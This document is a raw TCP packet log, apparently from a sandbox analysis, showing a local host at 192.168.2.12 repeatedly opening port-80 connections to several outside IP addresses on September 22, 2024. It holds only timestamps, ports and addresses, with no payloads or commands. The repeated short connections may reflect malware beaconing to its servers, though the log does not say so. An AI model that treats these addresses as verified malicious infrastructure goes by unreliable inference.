                                      Sep 22, 2024 17:36:38.496716022 CEST4972680192.168.2.123.33.130.190
                                      Sep 22, 2024 17:36:38.501569033 CEST80497263.33.130.190192.168.2.12
                                      Sep 22, 2024 17:36:43.735223055 CEST4972780192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:43.740114927 CEST8049727194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:43.740209103 CEST4972780192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:43.750760078 CEST4972780192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:43.755645990 CEST8049727194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:44.478441000 CEST8049727194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:44.478528023 CEST8049727194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:44.478632927 CEST4972780192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:45.263103962 CEST4972780192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:46.281735897 CEST4972880192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:46.286662102 CEST8049728194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:46.286789894 CEST4972880192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:46.296861887 CEST4972880192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:46.301644087 CEST8049728194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:47.045016050 CEST8049728194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:47.045073032 CEST8049728194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:47.045147896 CEST4972880192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:47.814290047 CEST4972880192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:48.828284025 CEST4972980192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:48.833412886 CEST8049729194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:48.833504915 CEST4972980192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:48.843801975 CEST4972980192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:48.848647118 CEST8049729194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:48.848771095 CEST8049729194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:49.547349930 CEST8049729194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:49.547461987 CEST8049729194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:49.547523022 CEST4972980192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:50.356360912 CEST4972980192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:51.375657082 CEST4973080192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:51.380621910 CEST8049730194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:51.380800009 CEST4973080192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:51.387424946 CEST4973080192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:51.392239094 CEST8049730194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:52.091631889 CEST8049730194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:52.091696024 CEST8049730194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:52.091837883 CEST4973080192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:52.094206095 CEST4973080192.168.2.12194.85.61.76
                                      Sep 22, 2024 17:36:52.099122047 CEST8049730194.85.61.76192.168.2.12
                                      Sep 22, 2024 17:36:57.295041084 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:57.301546097 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:57.301731110 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:57.313114882 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:57.539514065 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.825066090 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:58.961965084 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.961985111 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.961997986 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.962084055 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:58.962084055 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:58.962179899 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:58.963428020 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.963561058 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:58.963752985 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.963995934 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:58.967067957 CEST8049731162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:36:58.967207909 CEST4973180192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:36:59.846497059 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:00.857527971 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:00.950711966 CEST8049732162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:00.950969934 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:00.953908920 CEST8049732162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:00.954125881 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:00.962979078 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:00.990336895 CEST8049732162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:01.744304895 CEST8049732162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:01.747419119 CEST8049732162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:01.747489929 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:02.465801954 CEST4973280192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:03.485586882 CEST4973380192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:03.491065025 CEST8049733162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:03.491139889 CEST4973380192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:03.504765034 CEST4973380192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:03.510085106 CEST8049733162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:03.510210037 CEST8049733162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:04.171789885 CEST8049733162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:04.171895981 CEST8049733162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:04.172322989 CEST4973380192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:05.012924910 CEST4973380192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:06.058670998 CEST4973480192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:06.089484930 CEST8049734162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:06.089612007 CEST4973480192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:06.097460032 CEST4973480192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:06.113981009 CEST8049734162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:06.830910921 CEST8049734162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:06.832118988 CEST8049734162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:06.833599091 CEST4973480192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:06.834727049 CEST4973480192.168.2.12162.0.238.246
                                      Sep 22, 2024 17:37:06.851907015 CEST8049734162.0.238.246192.168.2.12
                                      Sep 22, 2024 17:37:12.040851116 CEST4973580192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:12.049523115 CEST804973538.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:12.049597979 CEST4973580192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:12.062062979 CEST4973580192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:12.068665981 CEST804973538.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:13.061850071 CEST804973538.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:13.065216064 CEST804973538.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:13.067528009 CEST4973580192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:13.092819929 CEST804973538.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:13.095554113 CEST4973580192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:13.575124025 CEST4973580192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:14.593966961 CEST4973680192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:14.629838943 CEST804973638.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:14.630284071 CEST4973680192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:14.641808033 CEST4973680192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:14.675645113 CEST804973638.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:15.650149107 CEST804973638.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:15.650922060 CEST804973638.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:15.650970936 CEST4973680192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:16.153156996 CEST4973680192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:17.173435926 CEST4973780192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:17.178545952 CEST804973738.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:17.180849075 CEST4973780192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:17.191477060 CEST4973780192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:17.196444988 CEST804973738.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:17.196474075 CEST804973738.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:18.132462025 CEST804973738.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:18.184294939 CEST4973780192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:18.366398096 CEST804973738.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:18.369751930 CEST4973780192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:18.700444937 CEST4973780192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:19.719960928 CEST4973880192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:19.991060019 CEST804973838.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:19.991194010 CEST4973880192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:20.002362967 CEST4973880192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:20.014185905 CEST804973838.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:20.987899065 CEST804973838.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:20.988126040 CEST804973838.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:20.989835978 CEST4973880192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:20.993442059 CEST4973880192.168.2.1238.47.233.65
                                      Sep 22, 2024 17:37:21.002705097 CEST804973838.47.233.65192.168.2.12
                                      Sep 22, 2024 17:37:26.054296970 CEST4973980192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:26.059415102 CEST8049739217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:26.059520960 CEST4973980192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:26.069617033 CEST4973980192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:26.074599028 CEST8049739217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:26.684700012 CEST8049739217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:26.684828043 CEST8049739217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:26.685467005 CEST4973980192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:27.575038910 CEST4973980192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:28.593578100 CEST4974080192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:28.620529890 CEST8049740217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:28.620758057 CEST4974080192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:28.631211042 CEST4974080192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:28.637624025 CEST8049740217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:29.379122972 CEST8049740217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:29.381053925 CEST8049740217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:29.381167889 CEST4974080192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:30.137643099 CEST4974080192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:31.156127930 CEST4974180192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:31.169117928 CEST8049741217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:31.171700001 CEST4974180192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:31.183517933 CEST4974180192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:31.188751936 CEST8049741217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:31.189017057 CEST8049741217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:31.889698982 CEST8049741217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:31.889832973 CEST8049741217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:31.889938116 CEST4974180192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:32.684743881 CEST4974180192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:33.705203056 CEST4974280192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:33.712790966 CEST8049742217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:33.712893963 CEST4974280192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:33.729764938 CEST4974280192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:33.736016989 CEST8049742217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:34.398056030 CEST8049742217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:34.398612022 CEST8049742217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:34.398631096 CEST8049742217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:34.402432919 CEST4974280192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:34.402432919 CEST4974280192.168.2.12217.70.184.50
                                      Sep 22, 2024 17:37:34.408216953 CEST8049742217.70.184.50192.168.2.12
                                      Sep 22, 2024 17:37:39.670552015 CEST4974380192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:39.675486088 CEST804974352.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:39.675569057 CEST4974380192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:39.688999891 CEST4974380192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:39.694020033 CEST804974352.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:40.150063992 CEST804974352.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:40.150166035 CEST4974380192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:41.199984074 CEST4974380192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:41.223661900 CEST804974352.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:42.218729973 CEST4974480192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:42.250155926 CEST804974452.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:42.250530005 CEST4974480192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:42.260867119 CEST4974480192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:42.298312902 CEST804974452.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:42.776647091 CEST804974452.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:42.776763916 CEST4974480192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:43.762506008 CEST4974480192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:43.770344019 CEST804974452.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:44.781481981 CEST4974580192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:44.786509037 CEST804974552.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:44.789614916 CEST4974580192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:44.800347090 CEST4974580192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:44.805780888 CEST804974552.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:44.806283951 CEST804974552.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:45.264736891 CEST804974552.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:45.264859915 CEST4974580192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:46.309405088 CEST4974580192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:46.318706036 CEST804974552.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:47.354017019 CEST4974680192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:47.361746073 CEST804974652.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:47.362349987 CEST4974680192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:47.373486996 CEST4974680192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:47.381855011 CEST804974652.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:47.855192900 CEST804974652.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:47.855748892 CEST804974652.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:47.855807066 CEST4974680192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:47.859113932 CEST4974680192.168.2.1252.223.13.41
                                      Sep 22, 2024 17:37:47.864109039 CEST804974652.223.13.41192.168.2.12
                                      Sep 22, 2024 17:37:53.148309946 CEST4974780192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:53.153688908 CEST80497473.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:53.158188105 CEST4974780192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:53.201939106 CEST4974780192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:53.206844091 CEST80497473.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:53.614353895 CEST80497473.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:53.614412069 CEST4974780192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:54.721486092 CEST4974780192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:54.727729082 CEST80497473.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:55.742810011 CEST4974880192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:55.747842073 CEST80497483.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:55.747941971 CEST4974880192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:55.766192913 CEST4974880192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:55.771200895 CEST80497483.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:56.204272032 CEST80497483.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:56.204350948 CEST4974880192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:57.278789997 CEST4974880192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:57.283766985 CEST80497483.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:58.299638033 CEST4974980192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:58.304616928 CEST80497493.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:58.304697037 CEST4974980192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:58.319055080 CEST4974980192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:58.324107885 CEST80497493.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:58.324237108 CEST80497493.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:58.850739956 CEST80497493.33.130.190192.168.2.12
                                      Sep 22, 2024 17:37:58.851876974 CEST4974980192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:59.825958967 CEST4974980192.168.2.123.33.130.190
                                      Sep 22, 2024 17:37:59.830885887 CEST80497493.33.130.190192.168.2.12
                                      Sep 22, 2024 17:38:00.845489025 CEST4975080192.168.2.123.33.130.190
                                      Sep 22, 2024 17:38:00.850580931 CEST80497503.33.130.190192.168.2.12
                                      Sep 22, 2024 17:38:00.850999117 CEST4975080192.168.2.123.33.130.190
                                      Sep 22, 2024 17:38:00.860290051 CEST4975080192.168.2.123.33.130.190
                                      Sep 22, 2024 17:38:00.865209103 CEST80497503.33.130.190192.168.2.12
                                      Sep 22, 2024 17:38:01.311247110 CEST80497503.33.130.190192.168.2.12
                                      Sep 22, 2024 17:38:01.311291933 CEST80497503.33.130.190192.168.2.12
                                      Sep 22, 2024 17:38:01.311469078 CEST4975080192.168.2.123.33.130.190
                                      Sep 22, 2024 17:38:01.314131975 CEST4975080192.168.2.123.33.130.190
                                      Sep 22, 2024 17:38:01.319016933 CEST80497503.33.130.190192.168.2.12
                                      Sep 22, 2024 17:38:06.345290899 CEST4975180192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:06.350348949 CEST8049751134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:06.350539923 CEST4975180192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:06.360938072 CEST4975180192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:06.365894079 CEST8049751134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:06.979486942 CEST8049751134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:06.979767084 CEST8049751134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:06.979933977 CEST4975180192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:07.872374058 CEST4975180192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:08.890552998 CEST4975280192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:08.895694971 CEST8049752134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:08.899674892 CEST4975280192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:08.908740044 CEST4975280192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:08.913572073 CEST8049752134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:09.553278923 CEST8049752134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:09.553297997 CEST8049752134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:09.553352118 CEST4975280192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:10.418781042 CEST4975280192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:11.437418938 CEST4975380192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:11.442364931 CEST8049753134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:11.445636988 CEST4975380192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:11.457020998 CEST4975380192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:11.463540077 CEST8049753134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:11.463603973 CEST8049753134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:12.094388008 CEST8049753134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:12.094497919 CEST8049753134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:12.094671011 CEST4975380192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:12.965805054 CEST4975380192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:14.053474903 CEST4975480192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:14.058541059 CEST8049754134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:14.058629990 CEST4975480192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:14.118634939 CEST4975480192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:14.123550892 CEST8049754134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:14.705265045 CEST8049754134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:14.705295086 CEST8049754134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:14.705558062 CEST4975480192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:14.708137989 CEST4975480192.168.2.12134.119.247.136
                                      Sep 22, 2024 17:38:14.714986086 CEST8049754134.119.247.136192.168.2.12
                                      Sep 22, 2024 17:38:27.947341919 CEST4975580192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:27.952188969 CEST8049755208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:27.952277899 CEST4975580192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:27.967509031 CEST4975580192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:27.972421885 CEST8049755208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:28.468280077 CEST8049755208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:28.468370914 CEST4975580192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:29.481451988 CEST4975580192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:29.486538887 CEST8049755208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:30.500560999 CEST4975680192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:30.533968925 CEST8049756208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:30.535762072 CEST4975680192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:30.547646999 CEST4975680192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:30.582520008 CEST8049756208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:31.090769053 CEST8049756208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:31.090903044 CEST4975680192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:32.059442043 CEST4975680192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:32.064601898 CEST8049756208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:33.081562042 CEST4975780192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:33.086700916 CEST8049757208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:33.086824894 CEST4975780192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:33.097605944 CEST4975780192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:33.102633953 CEST8049757208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:33.102664948 CEST8049757208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:33.624507904 CEST8049757208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:33.624572992 CEST4975780192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:34.607559919 CEST4975780192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:34.624347925 CEST8049757208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:35.626636028 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:35.631855965 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:35.631948948 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:35.643050909 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:35.649346113 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021282911 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021307945 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021312952 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021318913 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021327019 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021332026 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021342039 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021939039 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021956921 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021970034 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.021982908 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.025541067 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.035906076 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.035943985 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.035953999 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.037539005 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.116990089 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117007017 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117019892 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117029905 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117043018 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117055893 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117069006 CEST8049758208.91.197.27192.168.2.12
                                      Sep 22, 2024 17:38:37.117173910 CEST4975880192.168.2.12208.91.197.27
                                      Sep 22, 2024 17:38:37.117264986 CEST4975880192.168.2.12208.91.197.27
